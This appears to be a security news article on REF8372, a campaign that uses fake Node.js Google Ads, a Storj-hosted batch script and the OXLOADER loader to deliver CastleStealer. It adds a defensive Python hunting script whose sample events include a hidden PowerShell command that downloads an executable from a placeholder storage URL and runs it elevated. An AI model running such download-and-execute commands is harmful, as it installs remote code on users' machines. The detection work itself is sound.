
Malicious Google Ads Deliver CastleStealer via New OXLOADER Malware

Laptop screen shows fake Node.js download page on Google Ads against blurred cityscape.

"OXLOADER is in an early operational phase, but the engineering behind it suggests this family is worth watching," Elastic said.

REF8372: a paid-ad entry point and a pretend Node.js download

Elastic Security Labs has documented a campaign codenamed REF8372 that begins with malicious ads on Google. Users conducting searches such as "lts version of node.js" are redirected to a fraudulent site — node-js[.]prentiva99[.]info — surfaced through ads published under the verified name "ВОЛОДИМИР ТЕРЕЩЕНКО" and presented as based in Ukraine. Elastic's researchers note the advertiser account and its campaigns were removed from Google on May 14, 2026, but they do not assert whether that account is operated by the threat actor, a front, or a purchased identity.

Use of Storj to host scripts and executables

Victims who interact with the fake site are served a batch script hosted on Storj, a decentralized, open-source cloud storage platform. Elastic highlights the choice of Storj as deliberate: the campaign's reliance on a legitimate service demonstrates how actors can bypass domain-based reputation filters by hosting malicious components on widely used platforms.

How OXLOADER escalates and stages CastleStealer

The dropper behavior is multi-step. The Storj-hosted batch script presents a bogus installation-wizard UI while covertly downloading an executable, also hosted on Storj, called OXLOADER. The script then launches that executable through a PowerShell command run with the -Verb RunAs flag, which raises a Windows User Account Control (UAC) prompt and, if accepted, runs the loader elevated. Once launched, the loader uses DLL side-loading to load a rogue DLL that decrypts and executes the CastleStealer payload.

OXLOADER's obfuscation, staging and anti-analysis measures

Researchers Daniel Stepanic and Jia Yu Chan describe OXLOADER as using several advanced techniques to evade detection and analysis. The loader employs control-flow flattening, opaque predicates, and Mixed Boolean-Arithmetic (MBA) obfuscation; it contains self-modifying decryption stubs and abuses the Windows .reloc section to stage shellcode. Elastic also reports OXLOADER takes explicit steps to avoid running in sandboxed or virtualized environments. These engineering choices, Elastic says, have produced low detection rates across static engines and detonation runs, giving the loader "a window to operate before it gets hunted down."

CastleStealer, CastleLoader, and the BackgroundFix linkage

CastleStealer is identified as a .NET information stealer. Elastic notes it was recently distributed alongside CastleLoader in a separate campaign codenamed BackgroundFix, where the lure mimicked a free image-editing tool in a ClickFix-style approach. CastleLoader has been attributed to a threat activity cluster named GrayBravo. In REF8372, OXLOADER's role is to stage and deliver CastleStealer through the DLL side-loading and decryption sequence described by Elastic.

What this means for technologists, ad platforms, and end users

  • Technologists and security teams: Elastic's write-up highlights the need to detect advanced obfuscation patterns — control-flow flattening, Mixed Boolean-Arithmetic, and self-modifying stubs — and to account for staging via .reloc and DLL side-loading. Low static-detection rates reported by Elastic indicate defenders should combine behavioral detonation and runtime telemetry with static signatures.
  • Ad platforms and publishers: the campaign's use of Google Ads and a verified advertiser name underscores the potential for paid-ad channels to surface malicious landing pages; Elastic notes Google removed the advertiser account and campaigns on May 14, 2026. Whether the account was directly controlled by the actor or was a front remains unknown.
  • End users and enterprises: the attack leverages a plausible query ("lts version of node.js") and a familiar software-installation UI to lure clicks. Elastic's findings show actors continue to exploit legitimate cloud services — in this case Storj — to host scripts and executables, enabling them to bypass domain-reputation controls that many organizations rely on.
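The staging step described above (a batch script that downloads an executable from Storj and launches it through PowerShell with -Verb RunAs) leaves a distinctive trail in process-creation telemetry, which is the kind of runtime signal the "Technologists and security teams" point calls for. The following script is an added example, not Elastic's code or part of the original report: it scores Sysmon Event ID 1-style records (Image, ParentImage, CommandLine) for the batch-to-PowerShell, UAC-elevation and cloud-storage-download combination. The sample events, the storjshare.io host names, the EXAMPLE-ID URL path and the scoring weights are all constructed assumptions for illustration.

```python
"""Hunt process-creation events for the batch -> PowerShell -Verb RunAs staging
pattern reported for REF8372. Field names follow the Sysmon Event ID 1 schema;
all sample events below are constructed for this example, not real telemetry."""
import re
from dataclasses import dataclass, field
from urllib.parse import urlparse

# Storage hosts to treat as suspicious download origins. "storj" comes from the
# campaign write-up; "storjshare.io" is an assumed example of a public gateway name.
WATCHED_HOST_FRAGMENTS = ("storj", "storjshare.io")
ALERT_THRESHOLD = 4  # assumed tuning value: flag events scoring at least this

RE_RUNAS = re.compile(r"-verb\s+runas\b", re.IGNORECASE)
RE_DOWNLOAD = re.compile(
    r"\b(invoke-webrequest|iwr|downloadfile|downloadstring|curl|wget|start-bitstransfer)\b",
    re.IGNORECASE)
RE_URL = re.compile(r"https?://[^\s'\"<>;]+", re.IGNORECASE)


@dataclass
class Finding:
    event_id: int
    score: int
    reasons: list = field(default_factory=list)


def _basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev):
    """Score one process-creation event; 0 means nothing of interest was seen."""
    image, parent, cmd = _basename(ev["Image"]), _basename(ev["ParentImage"]), ev["CommandLine"]
    f = Finding(ev["EventRecordID"], 0)
    if image not in ("powershell.exe", "pwsh.exe"):
        return f
    if parent == "cmd.exe":  # batch scripts run under cmd.exe
        f.score += 1
        f.reasons.append("PowerShell spawned by cmd.exe (batch script host)")
    if RE_RUNAS.search(cmd):
        f.score += 2
        f.reasons.append("UAC elevation requested with -Verb RunAs")
    if RE_DOWNLOAD.search(cmd):
        f.score += 1
        f.reasons.append("download cmdlet or utility in command line")
    for url in RE_URL.findall(cmd):
        parsed = urlparse(url)
        host, path = parsed.netloc.lower(), parsed.path.lower()
        if any(frag in host for frag in WATCHED_HOST_FRAGMENTS):
            f.score += 2
            f.reasons.append(f"download from watched storage host {host}")
        if path.endswith(".exe"):
            f.score += 1
            f.reasons.append(f"executable fetched over HTTP: {url}")
    return f


def hunt(events, threshold=ALERT_THRESHOLD):
    """Return the findings whose score reaches the alert threshold."""
    return [f for f in map(score_event, events) if f.score >= threshold]


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [  # constructed records
    {"EventRecordID": 1, "ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": "powershell.exe -NoProfile -Command Get-Process"},
    {"EventRecordID": 2, "ParentImage": r"C:\Windows\System32\cmd.exe", "Image": PS,
     "CommandLine": ("powershell -w hidden -c \"Invoke-WebRequest -Uri "
                     "https://link.storjshare.io/s/EXAMPLE-ID/nodejs-setup.exe "
                     "-OutFile $env:TEMP\\nodejs-setup.exe; "
                     "Start-Process $env:TEMP\\nodejs-setup.exe -Verb RunAs\"")},
    {"EventRecordID": 3, "ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": "powershell Start-Process notepad.exe -Verb RunAs"},  # admin elevating
    {"EventRecordID": 4, "ParentImage": r"C:\Windows\System32\cmd.exe", "Image": PS,
     "CommandLine": "powershell -c \"iwr https://example.invalid/tools/archive.zip -OutFile archive.zip\""},
]

if __name__ == "__main__":
    for finding in hunt(SAMPLE_EVENTS):
        print(f"event {finding.event_id} score={finding.score}: " + "; ".join(finding.reasons))
```

Only event 2 crosses the threshold: a user elevating Notepad (event 3) or a batch job fetching an archive (event 4) each score 2, while the campaign-style record accumulates points from every stage at once. The weights are a starting point; in production the -Verb RunAs and watched-host terms would be tuned against the organization's own baseline of PowerShell activity.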

Elastic concludes that OXLOADER is early in operations but deliberately engineered: its combination of obfuscation, anti-VM measures, benign-looking masquerade code and unique staging techniques created a detection gap that the actor used to deliver CastleStealer. Key unresolved facts in Elastic's disclosure include whether the verified advertiser identity is genuinely tied to the actor and how many successful infections occurred before Google removed the ads on May 14, 2026. The documented reliance on Storj and the specific technical signatures Elastic and researchers Daniel Stepanic and Jia Yu Chan describe give defenders concrete artifacts to hunt for even as the campaign continues to evolve.

Original reporting: https://thehackernews.com/2026/06/new-oxloader-loader-uses-malicious.html